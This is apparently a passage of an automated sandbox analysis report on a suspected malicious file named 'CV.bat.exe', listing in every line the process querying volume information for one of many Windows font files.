Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
